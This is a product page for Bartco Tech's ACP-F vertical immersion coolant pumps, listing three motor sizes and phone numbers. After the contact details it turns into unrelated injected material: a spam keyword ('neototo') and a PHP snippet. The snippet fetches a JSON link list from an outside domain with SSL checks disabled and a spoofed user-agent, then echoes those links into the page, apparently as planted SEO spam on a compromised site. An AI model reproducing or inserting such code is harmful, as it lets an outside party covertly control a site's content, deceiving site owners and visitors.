ACP-F Series — Flood Coolant Pumps

For all your Machine Tool Coolant Pump needs, turn to Bartco Tech Corporation. We offer a comprehensive product line, including the ACP-F Series, designed specifically for flood cooling applications on machine tools.


ACP-F Series Coolant Pumps

The ACP-F Series consists of vertical immersion-type coolant pumps engineered for flood cooling applications on machine tools. These pumps provide reliable coolant flow for general-purpose cooling, chip flushing, and surface cleaning during machining operations.

Pump Description

The ACP “F” Series is a vertical immersion-type coolant pump designed for flood coolant delivery in machine tool applications. These pumps are ideal for machines that require consistent coolant circulation for cooling cutting tools and workpieces.


F Series Models

ACP-180F

Pump & Motor Specs:

  • Motor Output: 0.18 kW (180 W)

  • Mounting Style: Vertical immersion

  • Application: Flood cooling for machine tools


ACP-250F

Pump & Motor Specs:

  • Motor Output: 0.25 kW (250 W)

  • Mounting Style: Vertical immersion

  • Application: Flood cooling for machine tools


ACP-400F

Pump & Motor Specs:

  • Motor Output: 0.40 kW (400 W)

  • Mounting Style: Vertical immersion

  • Application: Flood cooling for machine tools


Why Choose Bartco Tech Corporation

Bartco Tech Corporation works closely with customers to ensure the correct coolant pump is selected for each machine tool application. Our extensive industry experience allows us to provide dependable solutions for a wide range of machining environments.


If you’re looking for a reliable flood coolant pump, the ACP-F Series offers multiple motor sizes to meet your machine’s cooling requirements.

Contact Bartco Tech Corporation today for specifications, pricing, and expert application support.

For more info call us: 610-942-4861

For more info call us: 610-942-7391

neototo

$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }